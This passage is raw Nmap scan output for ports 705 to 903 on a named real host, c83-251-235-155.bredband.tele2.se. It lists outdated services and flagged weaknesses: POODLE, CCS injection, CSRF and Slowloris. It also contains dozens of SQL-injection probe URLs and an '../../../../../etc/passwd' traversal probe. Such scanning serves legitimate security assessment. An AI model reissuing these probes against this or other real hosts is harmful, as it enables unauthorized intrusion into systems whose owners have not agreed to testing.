|     +OK TCPIP POP server V6.0-26, OpenVMS V9.2-3 x86_64 at x86vms.polarhome.com, up since 2025-07-24 10:16:27 <[email protected]>
|   HTTPOptions:
|     +OK TCPIP POP server V6.0-26, OpenVMS V9.2-3 x86_64 at x86vms.polarhome.com, up since 2025-07-24 10:16:27 <[email protected]>
|_    -ERR Unknown command: "options".
705/tcp   open  ssh                (protocol 1.5)
| fingerprint-strings:
|   NULL:
|_    SSH-1.5-OSU_1.5alpha6
711/tcp   open  ftp                WU-FTPD or MIT Kerberos ftpd 6.00LS
749/tcp   open  ssl/kerberos-adm?
| ssl-poodle:
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  CVE:CVE-2014-3566  BID:70574
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|     References:
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|       https://www.securityfocus.com/bid/70574
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
| ssl-ccs-injection:
|   VULNERABLE:
|   SSL/TLS MITM vulnerability (CCS Injection)
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
|       does not properly restrict processing of ChangeCipherSpec messages,
|       which allows man-in-the-middle attackers to trigger use of a zero
|       length master key in certain OpenSSL-to-OpenSSL communications, and
|       consequently hijack sessions or obtain sensitive information, via
|       a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|           
|     References:
|       http://www.openssl.org/news/secadv_20140605.txt
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
|_      http://www.cvedetails.com/cve/2014-0224
|_sslv2-drown: ERROR: Script execution failed (use -d to debug)
765/tcp   open  ssh                SCS sshd 2.4.1 (protocol 2.0)
801/tcp   open  tcpwrapped
873/tcp   open  http               Apache httpd 2.2.15 ((Mandriva Linux/PREFORK-3.2mdv2010.2))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-sql-injection:
|   Possible sqli for queries:
|     http://c83-251-235-155.bredband.tele2.se:873/doc/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:873/doc/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:873/doc/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:873/doc/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:873/doc/bzip2/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:873/doc/bzip2/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:873/doc/bzip2/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:873/doc/bzip2/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:873/doc/perl-Cairo/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:873/doc/perl-Cairo/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:873/doc/perl-Cairo/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:873/doc/perl-Cairo/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:873/doc/rsyslog/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:873/doc/rsyslog/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:873/doc/rsyslog/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:873/doc/rsyslog/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:873/doc/kdeplasma-addons/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:873/doc/kdeplasma-addons/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:873/doc/kdeplasma-addons/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:873/doc/kdeplasma-addons/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:873/doc/perl-Net-SMTP-SSL/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:873/doc/perl-Net-SMTP-SSL/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:873/doc/perl-Net-SMTP-SSL/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:873/doc/perl-Net-SMTP-SSL/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:873/doc/gnome-vfs2/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:873/doc/gnome-vfs2/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:873/doc/gnome-vfs2/?C=M%3BO%3DA%27%20OR%20sqlspider
|_    http://c83-251-235-155.bredband.tele2.se:873/doc/gnome-vfs2/?C=N%3BO%3DD%27%20OR%20sqlspider
|_http-server-header: Apache/2.2.15 (Mandriva Linux/PREFORK-3.2mdv2010.2)
| http-enum:
|   /: Root directory w/ directory listing
|   /robots.txt: Robots file
|   /README: Interesting, a readme.
|_  /doc/: Potentially interesting directory w/ listing on 'apache/2.2.15 (mandriva linux/prefork-3.2mdv2010.2)'
888/tcp   open  http               MiniServ 1.590 (Webmin httpd)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=c83-251-235-155.bredband.tele2.se
|   Found the following possible CSRF vulnerabilities:
|     
|     Path: http://c83-251-235-155.bredband.tele2.se:888/
|     Form id: save_1
|     Form action: /session_login.cgi
|     
|     Path: http://c83-251-235-155.bredband.tele2.se:888/session_login.cgi
|     Form id: save_1
|     Form action: /session_login.cgi
|     
|     Path: http://c83-251-235-155.bredband.tele2.se:888/unauthenticated/
|     Form id: save_1
|_    Form action: /session_login.cgi
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-litespeed-sourcecode-download:
| Litespeed Web Server Source Code Disclosure (CVE-2010-2333)
| /index.php source code:
| <!doctype html public "-//W3C//DTD HTML 3.2 Final//EN">
| <html>
| <head>
| <link rel='stylesheet' type='text/css' href='/unauthenticated/gray-reset-fonts-grids-base.css'>
| <link rel='stylesheet' type='text/css' href='/unauthenticated/gray-virtual-server-style.css' />
| <!--[if IE]>
| <style type="text/css">
| table.formsection, table.ui_table, table.loginform { border-collapse: collapse; }
| </style>
| <![endif]-->
| <script>
| var rowsel = new Array();
| </script>
| <script type='text/javascript' src='/unauthenticated/sorttable.js'></script>
| <meta http-equiv="Content-Type" content="text/html; Charset=UTF-8">
| <title>Login to Usermin</title></head>
| <body bgcolor=#ffffff link=#376ebd vlink=#376ebd text=#000000    onLoad='document.forms[0].pass.value = ""; document.forms[0].user.focus()'>
| <table class='header' width=100%><tr>
| <td id='headln2l' width=15% valign=top align=left></td>
| <td id='headln2c' align=center width=70%><font size=+2></font></td>
| <td id='headln2r' width=15% valign=top align=right></td></tr></table>
| <p><center>
|
| <form class='ui_form' action='/session_login.cgi' method='post'>
| <input class='ui_hidden' type='hidden' name="page" value="/">
| <table class='shrinkwrapper' width=40% class='loginform'>
| <tr><td>
| <table class='ui_table' width=40% class='loginform'>
| <thead><tr><td><b>Login to Usermin</b></td></tr></thead>
| <tbody> <tr class='ui_table_body'> <td colspan=1><table width=100%>
| <tr class='ui_form_pair'>
| <td class='ui_form_value' colspan=2 align=center>You must enter a username and password to login to the Usermin server on <h1>ubuntu.polarhome.com</h1>.</td>
| </tr>
| <tr class='ui_form_pair'>
| <td class='ui_form_label' ><b>Username</b></td>
| <td class='ui_form_value' colspan=1 ><input class='ui_textbox' type='text' name="user" value="" size=20></td>
| </tr>
| <tr class='ui_form_pair'>
| <td class='ui_form_label' ><b>Password</b></td>
| <td class='ui_form_value' colspan=1 ><input class='ui_password' type='password' name="pass" value="" size=20></td>
| </tr>
| <tr class='ui_form_pair'>
| <td class='ui_form_label' ><b> </b></td>
| <td class='ui_form_value' colspan=1 ><input class='ui_checkbox' type='checkbox' name="save" value="1"  id="save_1"> <label for="save_1">Remember login permanently?</label>
| </td>
| </tr>
| </tbody></table></td></tr></table>
| </td></tr>
| </table>
|
| <input class='ui_submit' type='submit' value="Login">
| <input class='ui_reset' type='reset' value="Clear">
| </form>
| <script type='text/javascript'>
| var opts = document.getElementsByClassName('ui_opt_textbox');
| for(var i=0; i<opts.length; i++) {
|   opts[i].disabled = document.getElementsByName(opts[i].name+'_def')[0].checked;
| }
| </script>
| </center>
|
| <script>
| if (window != window.top) {
|     window.top.location = window.location;
|     }
| </script>
| </div><p>
| <br>
|_</body></html>
| http-phpmyadmin-dir-traversal:
|   VULNERABLE:
|   phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
|     State: UNKNOWN (unable to test)
|     IDs:  CVE:CVE-2005-3299
|       PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.
|       
|     Disclosure date: 2005-10-nil
|     Extra information:
|       ../../../../../etc/passwd :
|   <!doctype html public "-//W3C//DTD HTML 3.2 Final//EN">
|   <html>
|   <head>
|   <link rel='stylesheet' type='text/css' href='/unauthenticated/gray-reset-fonts-grids-base.css'>
|   <link rel='stylesheet' type='text/css' href='/unauthenticated/gray-virtual-server-style.css' />
|   <!--[if IE]>
|   <style type="text/css">
|   table.formsection, table.ui_table, table.loginform { border-collapse: collapse; }
|   </style>
|   <![endif]-->
|   <script>
|   var rowsel = new Array();
|   </script>
|   <script type='text/javascript' src='/unauthenticated/sorttable.js'></script>
|   <meta http-equiv="Content-Type" content="text/html; Charset=UTF-8">
|   <title>Login to Usermin</title></head>
|   <body bgcolor=#ffffff link=#376ebd vlink=#376ebd text=#000000    onLoad='document.forms[0].pass.value = ""; document.forms[0].user.focus()'>
|   <table class='header' width=100%><tr>
|   <td id='headln2l' width=15% valign=top align=left></td>
|   <td id='headln2c' align=center width=70%><font size=+2></font></td>
|   <td id='headln2r' width=15% valign=top align=right></td></tr></table>
|   <p><center>
|   
|   <form class='ui_form' action='/session_login.cgi' method='post'>
|   <input class='ui_hidden' type='hidden' name="page" value="/">
|   <table class='shrinkwrapper' width=40% class='loginform'>
|   <tr><td>
|   <table class='ui_table' width=40% class='loginform'>
|   <thead><tr><td><b>Login to Usermin</b></td></tr></thead>
|   <tbody> <tr class='ui_table_body'> <td colspan=1><table width=100%>
|   <tr class='ui_form_pair'>
|   <td class='ui_form_value' colspan=2 align=center>You must enter a username and password to login to the Usermin server on <h1>ubuntu.polarhome.com</h1>.</td>
|   </tr>
|   <tr class='ui_form_pair'>
|   <td class='ui_form_label' ><b>Username</b></td>
|   <td class='ui_form_value' colspan=1 ><input class='ui_textbox' type='text' name="user" value="" size=20></td>
|   </tr>
|   <tr class='ui_form_pair'>
|   <td class='ui_form_label' ><b>Password</b></td>
|   <td class='ui_form_value' colspan=1 ><input class='ui_password' type='password' name="pass" value="" size=20></td>
|   </tr>
|   <tr class='ui_form_pair'>
|   <td class='ui_form_label' ><b> </b></td>
|   <td class='ui_form_value' colspan=1 ><input class='ui_checkbox' type='checkbox' name="save" value="1"  id="save_1"> <label for="save_1">Remember login permanently?</label>
|   </td>
|   </tr>
|   </tbody></table></td></tr></table>
|   </td></tr>
|   </table>
|   
|   <input class='ui_submit' type='submit' value="Login">
|   <input class='ui_reset' type='reset' value="Clear">
|   </form>
|   <script type='text/javascript'>
|   var opts = document.getElementsByClassName('ui_opt_textbox');
|   for(var i=0; i<opts.length; i++) {
|     opts[i].disabled = document.getElementsByName(opts[i].name+'_def')[0].checked;
|   }
|   </script>
|   </center>
|   
|   <script>
|   if (window != window.top) {
|       window.top.location = window.location;
|       }
|   </script>
|   </div><p>
|   <br>
|   </body></html>
|   
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299
|_      http://www.exploit-db.com/exploits/1244/
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-majordomo2-dir-traversal: ERROR: Script execution failed (use -d to debug)
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
898/tcp   open  http               MiniServ 1.590 (Webmin httpd)
| http-litespeed-sourcecode-download:
| Litespeed Web Server Source Code Disclosure (CVE-2010-2333)
| /index.php source code:
| <!doctype html public "-//W3C//DTD HTML 3.2 Final//EN">
| <html>
| <head>
| <link rel='stylesheet' type='text/css' href='/unauthenticated/gray-reset-fonts-grids-base.css'>
| <link rel='stylesheet' type='text/css' href='/unauthenticated/gray-virtual-server-style.css' />
| <!--[if IE]>
| <style type="text/css">
| table.formsection, table.ui_table, table.loginform { border-collapse: collapse; }
| </style>
| <![endif]-->
| <script>
| var rowsel = new Array();
| </script>
| <script type='text/javascript' src='/unauthenticated/sorttable.js'></script>
| <meta http-equiv="Content-Type" content="text/html; Charset=UTF-8">
| <title>Login to Usermin</title></head>
| <body bgcolor=#ffffff link=#376ebd vlink=#376ebd text=#000000    onLoad='document.forms[0].pass.value = ""; document.forms[0].user.focus()'>
| <table class='header' width=100%><tr>
| <td id='headln2l' width=15% valign=top align=left></td>
| <td id='headln2c' align=center width=70%><font size=+2></font></td>
| <td id='headln2r' width=15% valign=top align=right></td></tr></table>
| <p><center>
|
| <form class='ui_form' action='/session_login.cgi' method='post'>
| <input class='ui_hidden' type='hidden' name="page" value="/">
| <table class='shrinkwrapper' width=40% class='loginform'>
| <tr><td>
| <table class='ui_table' width=40% class='loginform'>
| <thead><tr><td><b>Login to Usermin</b></td></tr></thead>
| <tbody> <tr class='ui_table_body'> <td colspan=1><table width=100%>
| <tr class='ui_form_pair'>
| <td class='ui_form_value' colspan=2 align=center>You must enter a username and password to login to the Usermin server on <h1>scosysv.polarhome.com</h1>.</td>
| </tr>
| <tr class='ui_form_pair'>
| <td class='ui_form_label' ><b>Username</b></td>
| <td class='ui_form_value' colspan=1 ><input class='ui_textbox' type='text' name="user" value="" size=20></td>
| </tr>
| <tr class='ui_form_pair'>
| <td class='ui_form_label' ><b>Password</b></td>
| <td class='ui_form_value' colspan=1 ><input class='ui_password' type='password' name="pass" value="" size=20></td>
| </tr>
| <tr class='ui_form_pair'>
| <td class='ui_form_label' ><b> </b></td>
| <td class='ui_form_value' colspan=1 ><input class='ui_checkbox' type='checkbox' name="save" value="1"  id="save_1"> <label for="save_1">Remember login permanently?</label>
| </td>
| </tr>
| </tbody></table></td></tr></table>
| </td></tr>
| </table>
|
| <input class='ui_submit' type='submit' value="Login">
| <input class='ui_reset' type='reset' value="Clear">
| </form>
| <script type='text/javascript'>
| var opts = document.getElementsByClassName('ui_opt_textbox');
| for(var i=0; i<opts.length; i++) {
|   opts[i].disabled = document.getElementsByName(opts[i].name+'_def')[0].checked;
| }
| </script>
| </center>
|
| <script>
| if (window != window.top) {
|     window.top.location = window.location;
|     }
| </script>
| </div><p>
| <br>
|_</body></html>
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-phpmyadmin-dir-traversal:
|   VULNERABLE:
|   phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
|     State: UNKNOWN (unable to test)
|     IDs:  CVE:CVE-2005-3299
|       PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.
|       
|     Disclosure date: 2005-10-nil
|     Extra information:
|       ../../../../../etc/passwd :
|   <!doctype html public "-//W3C//DTD HTML 3.2 Final//EN">
|   <html>
|   <head>
|   <link rel='stylesheet' type='text/css' href='/unauthenticated/gray-reset-fonts-grids-base.css'>
|   <link rel='stylesheet' type='text/css' href='/unauthenticated/gray-virtual-server-style.css' />
|   <!--[if IE]>
|   <style type="text/css">
|   table.formsection, table.ui_table, table.loginform { border-collapse: collapse; }
|   </style>
|   <![endif]-->
|   <script>
|   var rowsel = new Array();
|   </script>
|   <script type='text/javascript' src='/unauthenticated/sorttable.js'></script>
|   <meta http-equiv="Content-Type" content="text/html; Charset=UTF-8">
|   <title>Login to Usermin</title></head>
|   <body bgcolor=#ffffff link=#376ebd vlink=#376ebd text=#000000    onLoad='document.forms[0].pass.value = ""; document.forms[0].user.focus()'>
|   <table class='header' width=100%><tr>
|   <td id='headln2l' width=15% valign=top align=left></td>
|   <td id='headln2c' align=center width=70%><font size=+2></font></td>
|   <td id='headln2r' width=15% valign=top align=right></td></tr></table>
|   <p><center>
|   
|   <form class='ui_form' action='/session_login.cgi' method='post'>
|   <input class='ui_hidden' type='hidden' name="page" value="/">
|   <table class='shrinkwrapper' width=40% class='loginform'>
|   <tr><td>
|   <table class='ui_table' width=40% class='loginform'>
|   <thead><tr><td><b>Login to Usermin</b></td></tr></thead>
|   <tbody> <tr class='ui_table_body'> <td colspan=1><table width=100%>
|   <tr class='ui_form_pair'>
|   <td class='ui_form_value' colspan=2 align=center>You must enter a username and password to login to the Usermin server on <h1>scosysv.polarhome.com</h1>.</td>
|   </tr>
|   <tr class='ui_form_pair'>
|   <td class='ui_form_label' ><b>Username</b></td>
|   <td class='ui_form_value' colspan=1 ><input class='ui_textbox' type='text' name="user" value="" size=20></td>
|   </tr>
|   <tr class='ui_form_pair'>
|   <td class='ui_form_label' ><b>Password</b></td>
|   <td class='ui_form_value' colspan=1 ><input class='ui_password' type='password' name="pass" value="" size=20></td>
|   </tr>
|   <tr class='ui_form_pair'>
|   <td class='ui_form_label' ><b> </b></td>
|   <td class='ui_form_value' colspan=1 ><input class='ui_checkbox' type='checkbox' name="save" value="1"  id="save_1"> <label for="save_1">Remember login permanently?</label>
|   </td>
|   </tr>
|   </tbody></table></td></tr></table>
|   </td></tr>
|   </table>
|   
|   <input class='ui_submit' type='submit' value="Login">
|   <input class='ui_reset' type='reset' value="Clear">
|   </form>
|   <script type='text/javascript'>
|   var opts = document.getElementsByClassName('ui_opt_textbox');
|   for(var i=0; i<opts.length; i++) {
|     opts[i].disabled = document.getElementsByName(opts[i].name+'_def')[0].checked;
|   }
|   </script>
|   </center>
|   
|   <script>
|   if (window != window.top) {
|       window.top.location = window.location;
|       }
|   </script>
|   </div><p>
|   <br>
|   </body></html>
|   
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299
|_      http://www.exploit-db.com/exploits/1244/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-majordomo2-dir-traversal: ERROR: Script execution failed (use -d to debug)
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=c83-251-235-155.bredband.tele2.se
|   Found the following possible CSRF vulnerabilities:
|     
|     Path: http://c83-251-235-155.bredband.tele2.se:898/
|     Form id: save_1
|     Form action: /session_login.cgi
|     
|     Path: http://c83-251-235-155.bredband.tele2.se:898/session_login.cgi
|     Form id: save_1
|     Form action: /session_login.cgi
|     
|     Path: http://c83-251-235-155.bredband.tele2.se:898/unauthenticated/
|     Form id: save_1
|_    Form action: /session_login.cgi
901/tcp   open  ftp                WU-FTPD wu-2.6.2
902/tcp   open  telnet             Siemens HiPath PBX telnetd
903/tcp   open  http               Apache httpd 2.0.36 ((Unix))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-sql-injection:
|   Possible sqli for queries:
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=A%27%20OR%20sqlspider&C=S
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=A&C=S%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=A%27%20OR%20sqlspider&C=M
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=A&C=M%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=D%27%20OR%20sqlspider&C=N
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=D&C=N%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=A%27%20OR%20sqlspider&C=D
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=A&C=D%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/man/?O=A%27%20OR%20sqlspider&C=S
|     http://c83-251-235-155.bredband.tele2.se:903/man/?O=A&C=S%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/man/?O=D%27%20OR%20sqlspider&C=N
|     http://c83-251-235-155.bredband.tele2.se:903/man/?O=D&C=N%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/man/?O=A%27%20OR%20sqlspider&C=M
|     http://c83-251-235-155.bredband.tele2.se:903/man/?O=A&C=M%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/man/?O=A%27%20OR%20sqlspider&C=D
|     http://c83-251-235-155.bredband.tele2.se:903/man/?O=A&C=D%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/phpinfo/?O=A%27%20OR%20sqlspider&C=M
|     http://c83-251-235-155.bredband.tele2.se:903/phpinfo/?O=A&C=M%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/phpinfo/?O=D%27%20OR%20sqlspider&C=N
|     http://c83-251-235-155.bredband.tele2.se:903/phpinfo/?O=D&C=N%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/phpinfo/?O=A%27%20OR%20sqlspider&C=S
|     http://c83-251-235-155.bredband.tele2.se:903/phpinfo/?O=A&C=S%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/phpinfo/?O=A%27%20OR%20sqlspider&C=D
|     http://c83-251-235-155.bredband.tele2.se:903/phpinfo/?O=A&C=D%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=A%27%20OR%20sqlspider&C=M
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=A&C=M%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=A%27%20OR%20sqlspider&C=D
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=A&C=D%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=A%27%20OR%20sqlspider&C=N
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=A&C=N%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=D%27%20OR%20sqlspider&C=S
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=D&C=S%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=A%27%20OR%20sqlspider&C=S
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=A&C=S%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=A%27%20OR%20sqlspider&C=D
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=A&C=D%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=D%27%20OR%20sqlspider&C=M
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=D&C=M%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=A%27%20OR%20sqlspider&C=N
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=A&C=N%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=A%27%20OR%20sqlspider&C=S
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=A&C=S%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=A%27%20OR%20sqlspider&C=M
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=A&C=M%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=D%27%20OR%20sqlspider&C=N
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=D&C=N%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=A%27%20OR%20sqlspider&C=D
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=A&C=D%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/doc/unixware/?O=A%27%20OR%20sqlspider&C=S
|     http://c83-251-235-155.bredband.tele2.se:903/doc/unixware/?O=A&C=S%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/doc/unixware/?O=D%27%20OR%20sqlspider&C=N
|     http://c83-251-235-155.bredband.tele2.se:903/doc/unixware/?O=D&C=N%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/doc/unixware/?O=A%27%20OR%20sqlspider&C=M
|     http://c83-251-235-155.bredband.tele2.se:903/doc/unixware/?O=A&C=M%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/doc/unixware/?O=A%27%20OR%20sqlspider&C=D
|     http://c83-251-235-155.bredband.tele2.se:903/doc/unixware/?O=A&C=D%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=A%27%20OR%20sqlspider&C=S
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=A&C=S%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=A%27%20OR%20sqlspider&C=M
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=A&C=M%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=A%27%20OR%20sqlspider&C=N
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=A&C=N%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=D%27%20OR%20sqlspider&C=D
|     http://c83-251-235-155.bredband.tele2.se:903/doc/?O=D&C=D%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/doc/packages/?O=A%27%20OR%20sqlspider&C=S
|     http://c83-251-235-155.bredband.tele2.se:903/doc/packages/?O=A&C=S%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/doc/packages/?O=A%27%20OR%20sqlspider&C=D
|     http://c83-251-235-155.bredband.tele2.se:903/doc/packages/?O=A&C=D%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/doc/packages/?O=D%27%20OR%20sqlspider&C=N
|     http://c83-251-235-155.bredband.tele2.se:903/doc/packages/?O=D&C=N%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/doc/packages/?O=A%27%20OR%20sqlspider&C=M
|     http://c83-251-235-155.bredband.tele2.se:903/doc/packages/?O=A&C=M%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/man/html.3N/?O=A%27%20OR%20sqlspider&C=D
|     http://c83-251-235-155.bredband.tele2.se:903/man/html.3N/?O=A&C=D%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/man/html.3N/?O=A%27%20OR%20sqlspider&C=S
|     http://c83-251-235-155.bredband.tele2.se:903/man/html.3N/?O=A&C=S%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/man/html.3N/?O=A%27%20OR%20sqlspider&C=M
|     http://c83-251-235-155.bredband.tele2.se:903/man/html.3N/?O=A&C=M%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/man/html.3N/?O=D%27%20OR%20sqlspider&C=N
|     http://c83-251-235-155.bredband.tele2.se:903/man/html.3N/?O=D&C=N%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/man/html.2/?O=A%27%20OR%20sqlspider&C=S
|     http://c83-251-235-155.bredband.tele2.se:903/man/html.2/?O=A&C=S%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/man/html.2/?O=A%27%20OR%20sqlspider&C=D
